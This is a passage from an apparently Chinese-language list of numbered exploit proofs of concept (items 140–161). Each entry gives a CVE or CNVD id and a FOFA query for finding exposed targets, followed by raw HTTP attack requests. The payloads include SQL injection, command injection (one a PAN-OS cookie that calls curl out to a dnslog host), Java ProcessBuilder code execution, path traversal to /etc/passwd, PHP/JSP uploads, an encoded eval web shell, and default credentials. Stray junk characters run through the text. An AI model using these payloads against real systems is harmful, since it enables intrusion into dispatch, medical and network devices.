CVE-2024-26220 e. e. B3 {% b) n5 F
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
: ]$ A8 }, Q. R: ^% TGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.19 w! e+ w: m& \6 ]& P. ]$ m) p0 z a
Host: x.x.x.x5 J9 Y! F; ~$ t+ x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0- ^0 n! S& J$ s1 ]! e& V# |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 C! |6 p) d& X" q' T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 p2 s5 ~6 N" O9 n- ?" v1 S4 EAccept-Encoding: gzip, deflate, br; v& r$ `5 X0 H
Connection: close5 V3 k( b, c! R1 ^( B
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
. C6 Y f2 {# B# pUpgrade-Insecure-Requests: 1
6 c+ ]" j) Q8 N
! `8 G, i( ?$ ~. g& Q$ C8 f' i# m& R$ J# y( h; G
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
/ n. w* @, M% A# E7 I& QCVE-2024-2566& q5 T' ]+ i) O5 p
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"1 |7 J, P. U2 d( A
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1* h1 v' H$ P" Q2 L% ^
Host: x.x.x.x
* t' U1 B- O% H! W+ i4 `9 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: a# C9 g7 P$ F& [2 OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 s1 o/ f [8 d( n: r) mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: u O' U+ @/ [$ }/ ~, _+ K$ K8 B
Accept-Encoding: gzip, deflate, br7 c9 m# I* h1 \+ q7 i& ]% k, F0 Q
Connection: close
. N8 J0 n' Q1 VCookie: authcode=h8g9: u$ ?6 B0 f( m! w* o
Upgrade-Insecure-Requests: 18 [3 f: Y) W+ u1 x) k
) s D$ Y: P9 r- T: S1 l
0 [, ?( T; O3 ]1 n) A
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
' N r+ U; ~6 O9 r3 i: {' x! ^FOFA:body="指挥调度管理平台", D! o. s, E$ W' V9 i: m
POST /app/ext/ajax_users.php HTTP/1.1
7 K3 G. {) ~% j H3 IHost: your-ip
0 h: N' ]% o+ @0 e; H: sUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
7 v' z L' M" s6 E EContent-Type: application/x-www-form-urlencoded
; K9 g/ X8 E# \
2 j9 O3 S; {0 d& }3 L) P3 T5 q( G% y, f4 _
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -1 x4 C2 k6 h5 w! U
& S. B* _4 D+ c$ F
( x1 [, r7 C. k! K9 S142. CMSV6车辆监控平台系统中存在弱密码8 g7 o! o( W* W+ _! G& }! |
CVE-2024-29666+ H+ H0 d% D0 x7 u' U
FOFA:body="/808gps/"
2 a1 ~4 W5 p7 T) w6 b5 {admin/admin
- e0 ^+ a8 D5 T# _' H: {9 v143. Netis WF2780 v2.1.40144 远程命令执行+ X6 B' q; Z" v! e
CVE-2024-258503 C- F; O. @! O% |$ {
FOFA:title='AP setup' && header='netis'9 S% B" T& Z/ k3 R5 j! P
PAYLOAD- I5 g7 F$ o( X4 @, J- }
/ p( |/ V! w* z0 k: X( o144. D-Link nas_sharing.cgi 命令注入# p7 E0 w* C1 x9 |) f! Z
FOFA:app="D_Link-DNS-ShareCenter"
x8 Q+ d2 ?$ P- `# ~& M) [system参数用于传要执行的命令: E2 j" o7 }5 S7 t7 ?
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1" X i! b; R1 p k4 Z
Host: x.x.x.x
# b# R% ~& |, K# ], WUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0* x$ n1 }1 j+ _" E- l
Connection: close
^9 N$ E* W7 H* ?; }' MAccept: */*
. U2 D' O+ W6 O1 IAccept-Language: en! E% ?& } A% K+ x2 c
Accept-Encoding: gzip
y& z0 c; b, a- i3 f( E0 V N) Z9 p, b; z# ]: q
( R6 C; v* q& d, B8 T! P0 n145. Palo Alto Networks PAN-OS GlobalProtect 命令注入+ ~- D5 I& d. Z- I4 Z/ T/ m
CVE-2024-3400& I. W0 b; j+ ~- L% n
FOFA:icon_hash="-631559155"
% T+ p b* ~7 yGET /global-protect/login.esp HTTP/1.1' o9 L5 I- b; p/ o" V" P& B/ ~
Host: 192.168.30.112:10050 e" @- s2 G; ]5 p; c% W/ T8 u( O2 w, q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84; L9 r0 d) f" y" f+ m/ l
Connection: close3 e# n6 P5 d& b; a( c8 q, p
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
4 I' }4 [$ g) T4 o0 ^Accept-Encoding: gzip
& w) B3 {. u% K- W. K
4 O! O" Q. C. P/ K G$ v
& G, H9 b( N2 e1 H# U146. MajorDoMo thumb.php 未授权远程代码执行
8 f9 `: Y3 A. W- i e$ ] gCNVD-2024-02175. A" h( l9 A0 d# Z8 {8 h
FOFA:app="MajordomoSL"
; }0 f' n/ ^# k6 e7 AGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1% ?0 ~* e) m5 Z! ^# ~* p: x) K4 `; C
Host: x.x.x.x
& }8 @8 f# |" R; G/ Q: z- aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84$ b1 e- V% c: g* ~' l ^* Y
Accept-Charset: utf-8( Z8 \. Z; U: E7 j' O7 U- q
Accept-Encoding: gzip, deflate
8 b& ^' c8 r6 n# L5 s: \8 n0 sConnection: close
3 v- d* Y2 a& g" q5 e- L$ V, P- y% F
% U. x, p+ S- D/ r! x7 b! F. o+ p; P0 f- g
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
( Y/ s. `3 ?7 z4 a" P* [CVE-2024-32399
5 I# _$ w/ V6 N6 XFOFA:body="RaidenMAILD"
! N( y7 u2 D [: {4 ^/ I4 x# _4 Q8 QGET /webeditor/../../../windows/win.ini HTTP/1.1
9 [. V8 A, X8 J" MHost: 127.0.0.1:81 B2 Y8 Q5 V% U5 W" Q: f
Cache-Control: max-age=0
# B3 ~7 e5 W; d, R" OConnection: close4 m" z% b7 [+ {( E5 ?
O1 Y. K' B6 i8 b
( o! i( Y2 {* g5 j* z1 I* u, [ G9 W1 H148. CrushFTP 认证绕过模板注入
. S" j. U8 {+ u' |+ G# U5 J9 x/ gCVE-2024-4040
' x, {9 H$ H5 c& U) OFOFA:body="CrushFTP"% m& ?" z+ ~. b P7 s( v) n( W3 }
PAYLOAD" V# {$ b5 q; u9 D! I
" |! L( j9 ^% S% r
149. AJ-Report开源数据大屏存在远程命令执行
, w& w( I& D; C# iFOFA:title="AJ-Report"
( q& Q8 L% M- h$ @$ E+ s$ b) B7 u" A- s, G0 R
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
% w o( S7 N3 S1 r: [9 fHost: x.x.x.x C& v' M- ]% n7 \6 o! [/ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ y. m3 A8 v6 O* _' r! o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 }; v8 O( _1 z1 K0 Y- h9 X6 _$ |Accept-Encoding: gzip, deflate, br( |" @+ |, Q" z% R. ]# H! u
Accept-Language: zh-CN,zh;q=0.9- `) r2 {8 Z. y' ~7 X; W
Content-Type: application/json;charset=UTF-8, o; j+ @* E5 A, A
Connection: close, t6 W9 w5 _5 @5 J
; O1 {: A6 h1 j- i* p/ x
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
& V( y/ a/ N& d
0 |, J3 w) i; l; |+ V% `150. AJ-Report 1.4.0 认证绕过与远程代码执行
( m* a' K7 }6 W w. d4 |2 rFOFA:title="AJ-Report"
( O2 z2 K8 j' U3 [0 d& G; aPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
9 q3 A) h5 T8 g) JHost: x.x.x.x
7 U- q7 w0 U! T% d+ ?* \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; l% k7 q1 k/ e% `# S( qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) o6 ]$ h$ D7 Z$ M$ r& k$ ^% e
Accept-Encoding: gzip, deflate, br
" f( Q7 x- B3 `8 J% M9 HAccept-Language: zh-CN,zh;q=0.9
3 R6 j6 U. w& U9 }, I, D1 ?Content-Type: application/json;charset=UTF-8
, E/ V- W2 e. ~6 DConnection: close
2 d/ p5 i6 E" L! N" d6 x4 uContent-Length: 339! M" i+ I( d4 K( g" J |6 \
( E( R- I V4 H2 w( f' d9 w+ u{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
# l& W& X2 ]$ `+ z2 O1 w4 X4 ]. z6 C2 E9 p* ^
% x; l1 O2 A* k, f5 j( K3 u$ G8 d
151. AJ-Report 1.4.1 pageList sql注入
3 T# v `' X' k ?% x; h0 O. I( T) xFOFA:title="AJ-Report"
; }' f8 Q+ j2 @$ ]) BGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
- V: K7 S1 I* m3 T; v4 VHost: x.x.x.x
1 i: s" C j5 x" R% K. N5 `1 x5 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 u# m" Y- D4 ?6 X$ r9 c% x' ^
Connection: close- F! Y# T7 `5 y/ s8 a
Accept-Encoding: gzip% n' R5 u, U+ c, v
0 k# W. |& N2 G& s5 u
' y* ?6 a# d. `, e' s5 H152. Progress Kemp LoadMaster 远程命令执行
5 g/ Q7 U7 R/ p( g3 I0 u/ |CVE-2024-1212
5 E" Z( F0 c- RLoadMaster <= 7.2.59.2 (GA)2 z+ [: b6 a0 q# |/ o. U+ Q$ y$ z
LoadMaster<=7.2.54.8 (LTSF)
5 G/ b. [# `5 q2 k$ ]LoadMaster <= 7.2.48.10 (LTS)6 O4 [( a/ Y' {$ n# I; w- w) H
FOFA:body="LoadMaster"
, }9 K2 n& |2 ~% f, dJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码% U& `' k0 \6 {: }3 g+ q
GET /access/set?param=enableapi&value=1 HTTP/1.1
7 P, W0 f& U' c8 R' @1 m: p/ cHost: x.x.x.x
- V1 x3 l& l. b$ nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
7 G+ Z1 ], K# W6 F9 L- `Connection: close, A$ W- J$ W- A
Accept: */*
/ `3 j7 P: y4 W# Y. EAccept-Language: en$ y7 C" p& |6 z# f2 q E( c
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
, k; _9 W X) z% Q' MAccept-Encoding: gzip
1 P- P" g; [. Y
* I6 S3 r0 x! n; J
& f- f7 `+ r& X6 }, E153. gradio任意文件读取
/ [- `. i' o! c0 A1 g: O, \8 cCVE-2024-1561FOFA:body="__gradio_mode__"
8 S- L2 k' t6 V; W! B0 x; f& M- l第一步,请求/config文件获取componets的id9 @( X. [- P+ P1 G, _3 l6 z
http://x.x.x.x/config
% P r% i i- R3 g) a
9 [( x# _; t8 T. p1 K0 H, Q. \' _
第二步,将/etc/passwd的内容写入到一个临时文件
3 V$ Q9 }; Z0 R" m/ v4 i/ kPOST /component_server HTTP/1.1' z# }4 l# x l2 i+ P d" C- i
Host: x.x.x.x) u! Z. C4 d5 U; m6 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3! B; s# w2 V# G) F7 l
Connection: close
$ {9 t; q! }0 c2 O8 ?8 t8 KContent-Length: 1150 [+ C' u! ]4 U# @" x9 j0 F/ O
Content-Type: application/json
# l" Q" Q3 l5 T/ }% i- `/ \Accept-Encoding: gzip
; h( V$ v$ N8 y: ^$ g% Y/ z u, W& F: C- q( g$ K
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
1 Q3 q) C8 w- |" y& z
+ y6 |0 O% i+ A4 j& H3 n! m }. ^2 ~9 i1 f1 W9 @9 U
第三步访问0 ] h! ?8 j( w
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
6 p/ q8 `: h3 Q8 ~, n! E2 J) Z! J! \- Q
( b h4 U4 C# \) K+ T
154. 天维尔消防救援作战调度平台 SQL注入. e! e! M, V2 G! N w# B
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"& j m7 H7 Q" F/ Q: m7 I5 I, R
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
( [6 E6 g& N c8 JHost: x.x.x.x
# E) u% i$ A6 t, _Content-Length: 106
! _" g b& c: O# KCache-Control: max-age=0
% P' u! ^0 L. g& g) yUpgrade-Insecure-Requests: 11 R4 `, d& x& {. F& e) R. X( y/ B
Origin: http://x.x.x.x L [" N' N3 ^
Content-Type: application/json
; t! N1 f6 a' p* s( t+ f: ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36% g/ E# @+ v# Z/ d+ S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ f8 q( l# `. Q/ H* ?
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
# }8 W0 T" ^% Z# e2 Y0 u# eAccept-Encoding: gzip, deflate+ e) j9 P+ z8 J2 K: A+ I
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7; j* x; W5 j0 R% `+ X7 d; k8 V1 A
Connection: close
8 {. W" v6 C" w- S# p( T# w4 c/ N
8 S6 j- m: s" Q( A{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}4 c8 A$ x8 t- _+ y( Z8 c
" e/ h: z2 i$ X& Y1 `9 f) u5 {# ~: z0 o+ x9 B& P" C
155. 六零导航页 file.php 任意文件上传
) G/ X7 p0 @. q2 O8 k* b. `CVE-2024-34982
& X& c8 h8 N0 i ^# ]) ?FOFA:title=="上网导航 - LyLme Spage"3 Q" X5 f/ A0 ^2 h
POST /include/file.php HTTP/1.1
: T+ K9 a% a- q4 Q) k* x5 SHost: x.x.x.x5 H: f0 g9 D2 t8 w: i# v1 ]* r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
; u% O& A" H! h3 A# EConnection: close& w/ T# o/ a/ q
Content-Length: 232
, I- f$ ]+ K4 m! JAccept: application/json, text/javascript, */*; q=0.01' K4 w* h7 x0 d& I6 G# W; f. ~$ x
Accept-Encoding: gzip, deflate, br
, r: }1 u4 ~( U) Y# cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 d/ B* P/ O b9 [% v. ]- l
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f0 |7 D, p8 O, ^6 {4 ]( B
X-Requested-With: XMLHttpRequest
/ ^0 @7 x( N; ]1 I4 a' D2 o. f! W' R; D1 { X( H
-----------------------------qttl7vemrsold314zg0f
) b2 M6 t6 p1 [, h( }Content-Disposition: form-data; name="file"; filename="test.php"
3 P7 I F8 X7 s% ?6 [2 MContent-Type: image/png
* j- v5 v' d, t y3 f! Z
! P7 n A6 F! V# e8 C8 X! A; a/ V<?php phpinfo();unlink(__FILE__);?>
; y5 l: b8 p3 I! K" t o# w$ @/ i-----------------------------qttl7vemrsold314zg0f--) T- p5 H% e4 N' n6 U
/ B0 I- B4 A- J: o6 V
, |9 w6 I8 |9 \; {& H) N访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
' F f, g- ^6 C3 N& X1 \& ?( M3 M# \1 k3 p0 u
156. TBK DVR-4104/DVR-4216 操作系统命令注入
% G. R* D: R! A1 z# C6 l$ dCVE-2024-3721
& R0 f/ |4 o9 P+ k! BFOFA:"Location: /login.rsp"3 p: z h/ [1 {0 g' e3 i
·TBK DVR-4104
: t- C1 t" u' W, B" `% L·TBK DVR-4216
! D2 K+ I: V w: }curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"9 Z# d% u n. i% Y
- X, r$ ~. B: A' A) z
) H# B1 k a ^8 g6 @POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
' E/ Y; r! h9 ]8 x: B9 oHost: x.x.x.x
# ]6 z5 j; r) n8 SUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ t) H: k7 V: [
Connection: close, B( m8 R3 m4 u/ p
Content-Length: 0
4 p) l. l$ e" z! T1 x; l+ s- v: YCookie: uid=1
: J& M' S* s4 f- Z/ EAccept-Encoding: gzip# u/ @% c1 D3 N) E8 z2 n; H
$ \2 t# W; S# e7 Q3 B
1 [0 q8 ~2 _1 H. l: z' z* |
157. 美特CRM upload.jsp 任意文件上传
0 R4 L* o5 z+ S4 [' O& Q6 L* MCNVD-2023-06971
. L% y* g! U. eFOFA:body="/common/scripts/basic.js"
! `: e+ S$ Z* UPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1; U0 `& r) c4 s' l Y/ B8 J. Q
Host: x.x.x.x8 Q! U% J% q8 `/ V" H0 A i! i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36- F$ m9 {- S7 P2 z O7 y: q
Content-Length: 709
3 T$ u2 V6 J, i) k( LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ G" H b7 W4 A# c7 g9 Y' ZAccept-Encoding: gzip, deflate
7 z a6 ]& T/ V0 hAccept-Language: zh-CN,zh;q=0.9
0 l( w- h3 C5 h q7 RCache-Control: max-age=0 d" U- y# d: X" h& A
Connection: close
0 n4 ^) k! ` ^9 n& T* m1 d& lContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN- p+ i6 ^% i8 D) x
Upgrade-Insecure-Requests: 1
! n' M! L r+ M7 m4 H
5 W# B/ K: L: _------WebKitFormBoundary1imovELzPsfzp5dN
) y3 {' r3 D5 V) |Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
1 n3 i1 I, N; x7 CContent-Type: application/octet-stream, i2 b! w4 `' K- M' Z
- A7 | }6 K5 B8 w
nyhelxrutzwhrsvsrafb
+ w& r# ^. u3 i N4 L8 O------WebKitFormBoundary1imovELzPsfzp5dN
; x) K q: c7 i8 ^# d: a6 OContent-Disposition: form-data; name="key"/ H* {5 T& M1 d6 G" T4 @6 C
/ I* u( w9 m+ q, W* K! L
null( X6 F: A# T1 \1 ~/ u8 m$ ^
------WebKitFormBoundary1imovELzPsfzp5dN' R2 M4 C6 w$ N% M5 S, w& q
Content-Disposition: form-data; name="form"
5 x* B7 K" t) p* ?
D0 M# r% R) o6 M/ | }5 H3 y5 E% Anull, E1 a t, D X, ~( Z) u p
------WebKitFormBoundary1imovELzPsfzp5dN
' \* U7 ?0 P$ c' F a- v1 c5 ^Content-Disposition: form-data; name="field"7 J$ o# V9 q5 E0 I: P
+ M, @- x4 g! V1 U* lnull
% m+ w7 m. u; {3 m# A------WebKitFormBoundary1imovELzPsfzp5dN2 A- U' m* Q# i4 c2 ^9 L( D8 U9 L
Content-Disposition: form-data; name="filetitile"8 p' |) j+ P- E- u0 f. w
) h. F P/ x5 Cnull& P; G2 R' u# \( R
------WebKitFormBoundary1imovELzPsfzp5dN
; ~0 N/ r& v% w7 l8 w/ c# h+ E5 v8 zContent-Disposition: form-data; name="filefolder"! ~- b( c% W$ l! Y
4 K7 Y; x6 w9 b0 i( tnull# F- p& j4 |! @2 y) u% I" i" i
------WebKitFormBoundary1imovELzPsfzp5dN--
) X! k: ?- D+ {( p; h% ?5 V# ^1 r1 G
9 @# E+ U3 v" r0 qhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
/ s# S! g( p" A, {$ P
3 w- U1 I- B9 R) H158. Mura-CMS-processAsyncObject存在SQL注入
; P% c2 u$ x6 P# ?. T8 _CVE-2024-32640 R/ g3 P) x7 l M* q; i8 w4 b
FOFA:"Generator: Masa CMS") K2 t0 m4 u( I% C. D- d
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1& F) Z' ?7 G8 q; X/ W+ u) N+ i, |
Host: {{Hostname}}
. \: f+ }5 ? _* _- [Content-Type: application/x-www-form-urlencoded; T" J7 w8 S, \
' j, G3 W8 p# ]1 x( P D8 eobject=displayregion&contenthistid=x\'&previewid=1+ q1 ^! S' z0 a9 q' s6 g/ w* y3 Z/ j
+ W* F4 U: V" v) g0 |2 ^6 V
4 i+ @& g+ }; |5 ]1 ~, T+ F0 w
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传$ E5 y' y3 A) T0 r# e
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928"), ^" K" \ e0 u; @( `9 P
POST /webservices/WebJobUpload.asmx HTTP/1.1" l" q6 s* n/ z+ H* ]" h
Host: x.x.x.x
% `% o6 w5 @8 s! L# a/ GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
+ c1 t# ]/ T' \/ j" AContent-Length: 1080/ ^! M2 l5 ]" L* k7 S8 e
Accept-Encoding: gzip, deflate
/ g. K& g' O" h4 v4 \Connection: close
5 j [$ X0 T# i7 l* ]7 t8 b2 mContent-Type: text/xml; charset=utf-8' j, A) i, U7 ]8 i) S5 @0 U. ^6 R e
Soapaction: "http://rainier/jobUpload"6 M+ o) g: j& W: A6 v1 N6 Q
" e1 K7 F( ]0 S7 Q2 z<?xml version="1.0" encoding="utf-8"?>, m6 q( |3 y9 o$ E
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">8 L) {# c: R+ @, `: x; Z
<soap:Body>3 O! R% u8 i' K" {- Y
<jobUpload xmlns="http://rainier">
2 V4 Q& q3 V; p L+ O T<vcode>1</vcode>
' l; M' V) ]) u6 R: Z<subFolder></subFolder>3 A7 b9 O% ^! ^1 B' g
<fileName>abcrce.asmx</fileName>/ X. k6 Y% Z; p9 @4 ]
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>, M) ^! B1 o, ]: w8 I+ \5 @6 M
</jobUpload>2 V I. X3 ~; f
</soap:Body>
' q: v0 F( Y5 B6 v n3 ^2 w% t9 z3 o</soap:Envelope>
9 c/ p6 F: S; b' X! s+ ]
; B5 f# i$ V/ L. X( u
% q3 x/ Z" [5 x7 k4 ~$ v Z/ k1 V/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
3 |& q$ A4 m: @, i2 K" h) b- Q% W' n/ g# @" d* n
% ?' O8 j) c4 @4 W: ?5 o
160. Sonatype Nexus Repository 3目录遍历与文件读取
% M/ x. R; Y" N4 k9 {0 K5 PCVE-2024-49564 X7 B4 \) @7 J: e+ [2 J( p
FOFA:title="Nexus Repository Manager"
7 b4 ]" i. R" X8 Q3 y! y9 EGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
' L) l. L1 J- W9 z8 zHost: x.x.x.x
2 K9 f, C! s+ a4 Q& RUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.03 \( I' t4 j1 y1 a; I- ]4 C& n1 V
Connection: close
) L( `7 {7 j7 K+ U' h; YAccept: */*
6 t$ _ }$ O8 W: x: tAccept-Language: en
: \5 z' Q8 o# n% Y6 ?2 M2 XAccept-Encoding: gzip
) G; I9 Y, [4 F
: ]0 o; X! X+ B! q5 h0 D& Y" H8 V. n+ f
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
6 ` u- `. b; k! ]& q% JFOFA:body="/KT_Css/qd_defaul.css"
/ S( ~5 ~9 u7 T& S第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
5 X5 E' \6 c5 MPOST /Webservice.asmx HTTP/1.1! ]/ |( H. t0 y, x" s
Host: x.x.x.x
4 E1 o, W- d! f% SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
! _% s8 k; ] |! e* W, C$ sConnection: close
& ~! K( P6 G$ U' g3 T+ n) TContent-Length: 445
* |: g; w, A# ^& a4 Q9 k! }3 JContent-Type: text/xml$ R% {& Y; A u9 Y% s4 L
Accept-Encoding: gzip) Z! z6 Z1 H) U
( \& s% S J" c- E# ^+ {& w7 A<?xml version="1.0" encoding="utf-8"?>9 I5 g' N% Z! x( W o
<soap:Envelope xmlns:xsi="
* i) D$ M, |, r: Zhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
4 ?7 M9 l3 I: \; Dxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">7 k- _! L* \3 |/ M9 n
<soap:Body>
